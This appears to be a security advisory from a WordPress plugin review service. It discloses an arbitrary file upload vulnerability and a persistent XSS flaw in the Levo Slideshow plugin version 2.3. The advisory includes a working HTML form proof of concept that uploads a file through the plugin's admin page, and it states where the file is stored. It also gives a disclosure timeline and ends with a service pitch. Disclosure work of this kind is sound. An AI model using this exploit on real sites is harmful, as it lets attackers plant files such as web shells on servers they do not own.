The Levo Slideshow plugin has an arbitrary file upload vulnerability (as well as a persistent cross-site scripting (XSS) vulnerability and possibly other security issues) as of version 2.3. The details of the underlying issue that causes this can be found in our post for a vulnerability in the plugin Vertical Slideshow, which shares the same vulnerable code.

Proof of Concept

The following proof of concept will create a new category in the plugin, with the selected file as the Category Image. If there are no pre-existing categories the uploaded file will be located in the directory /wp-content/uploads/levoslideshow/1_uploadfolder/big/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=levoslideshow_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="lvo_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

• 6/7/2016 – WordPress.org Plugin Directory notified.

---

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.